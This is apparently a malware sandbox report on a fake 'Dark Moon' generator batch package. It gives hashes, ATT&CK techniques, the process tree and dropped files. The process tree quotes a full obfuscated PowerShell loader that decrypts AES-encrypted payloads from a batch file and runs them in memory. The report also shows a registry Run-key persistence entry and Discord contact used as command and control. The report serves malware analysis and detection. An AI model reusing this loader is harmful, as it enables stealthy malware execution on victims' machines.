e3b738d063a721f7fbc486125d6ff34e238f1f1ff5561af2b6db80eec5ae5654

General

Target

DarkMoon_Gen_1-3/starter.bat
Size

51B
MD5

abc778ba27885c72f364ad89b1306862
SHA1

2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
SHA256

97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
SHA512

65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

uni.bat.exe

pid process

2104 uni.bat.exe
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

2136 cmd.exe

pid	process
2104	uni.bat.exe

pid	process
2136	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

main.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	main.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service
T1102

Processes:

flow ioc

2 discord.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
2	discord.com

Delays execution with timeout.exe 13 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2660	timeout.exe
2800	timeout.exe
2272	timeout.exe
2316	timeout.exe
3012	timeout.exe
1984	timeout.exe
2028	timeout.exe
1188	timeout.exe
484	timeout.exe
2908	timeout.exe
1388	timeout.exe
2308	timeout.exe
1904	timeout.exe

Runs ping.exe 1 TTPs 17 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
2328	PING.EXE
2752	PING.EXE
1628	PING.EXE
1312	PING.EXE
2732	PING.EXE
2584	PING.EXE
2676	PING.EXE
2596	PING.EXE
2488	PING.EXE
468	PING.EXE
768	PING.EXE
1280	PING.EXE
2740	PING.EXE
2604	PING.EXE
2644	PING.EXE
2912	PING.EXE
2816	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

uni.bat.exe

pid process

2104 uni.bat.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

uni.bat.exe

description pid process

Token: SeDebugPrivilege 2104 uni.bat.exe

pid	process
2104	uni.bat.exe

description	pid	process
Token: SeDebugPrivilege	2104	uni.bat.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exemain.execmd.execmd.exe

description	pid	process	target process
PID 2056 wrote to memory of 2136	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2136	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2136	2056	cmd.exe	cmd.exe
PID 2056 wrote to memory of 2188	2056	cmd.exe	main.exe
PID 2056 wrote to memory of 2188	2056	cmd.exe	main.exe
PID 2056 wrote to memory of 2188	2056	cmd.exe	main.exe
PID 2188 wrote to memory of 2904	2188	main.exe	cmd.exe
PID 2188 wrote to memory of 2904	2188	main.exe	cmd.exe
PID 2188 wrote to memory of 2904	2188	main.exe	cmd.exe
PID 2904 wrote to memory of 2100	2904	cmd.exe	chcp.com
PID 2904 wrote to memory of 2100	2904	cmd.exe	chcp.com
PID 2904 wrote to memory of 2100	2904	cmd.exe	chcp.com
PID 2904 wrote to memory of 3012	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 3012	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 3012	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2676	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2676	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2676	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2740	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2740	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2740	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2604	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2604	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2604	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2596	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2596	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2596	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2328	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2328	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2328	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2732	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2732	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2732	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2584	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2584	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2584	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2644	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2644	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2644	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2488	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2488	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2488	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 1984	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 1984	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 1984	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2912	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2912	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2912	2904	cmd.exe	PING.EXE
PID 2136 wrote to memory of 2104	2136	cmd.exe	uni.bat.exe
PID 2136 wrote to memory of 2104	2136	cmd.exe	uni.bat.exe
PID 2136 wrote to memory of 2104	2136	cmd.exe	uni.bat.exe
PID 2904 wrote to memory of 2660	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2660	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2660	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2752	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2752	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2752	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2800	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2800	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2800	2904	cmd.exe	timeout.exe
PID 2904 wrote to memory of 2816	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2816	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2816	2904	cmd.exe	PING.EXE
PID 2904 wrote to memory of 2908	2904	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K uni.bat
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2136

C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exe
main.exe
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\cmd.exe
cmd /c "Dark Moon gen.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:2904

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:2100

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:3012

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2676

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2740

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2604

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2596

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2328

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2732

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2584

C:\Windows\system32\PING.EXE
ping localhost -n 1
4⤵
- Runs ping.exe
PID:2644

C:\Windows\system32\PING.EXE
ping discord.com
4⤵
- Runs ping.exe
PID:2488

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1984

C:\Windows\system32\PING.EXE
ping www.paysafecard.com
4⤵
- Runs ping.exe
PID:2912

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2660

C:\Windows\system32\PING.EXE
ping www.amazon.com
4⤵
- Runs ping.exe
PID:2752

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2800

C:\Windows\system32\PING.EXE
ping play.google.com
4⤵
- Runs ping.exe
PID:2816

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2908

C:\Windows\system32\PING.EXE
ping store.steampowered.com
4⤵
- Runs ping.exe
PID:1628

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:2028

C:\Windows\system32\PING.EXE
ping netflix.com
4⤵
- Runs ping.exe
PID:1312

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1188

C:\Windows\system32\PING.EXE
ping www.spotify.com
4⤵
- Runs ping.exe
PID:468

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:484

C:\Windows\system32\PING.EXE
ping www.xbox.com
4⤵
- Runs ping.exe
PID:768

C:\Windows\system32\timeout.exe
timeout 0
4⤵
- Delays execution with timeout.exe
PID:1388

C:\Windows\system32\timeout.exe
timeout 1
4⤵
- Delays execution with timeout.exe
PID:2316

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:1904

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2272

C:\Windows\system32\PING.EXE
ping www.google.com
4⤵
- Runs ping.exe
PID:1280

C:\Windows\system32\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2308

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
Filesize
35KB

MD5
c153581143e0b72cecae38a393991a4b

SHA1
da43d03b19765594ff124415a060551343823a39

SHA256
2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005

SHA512
8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f

Download Submit
\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/2104-8-0x000000001B3A0000-0x000000001B682000-memory.dmp

Filesize
2.9MB

Download
memory/2104-9-0x0000000002180000-0x0000000002188000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads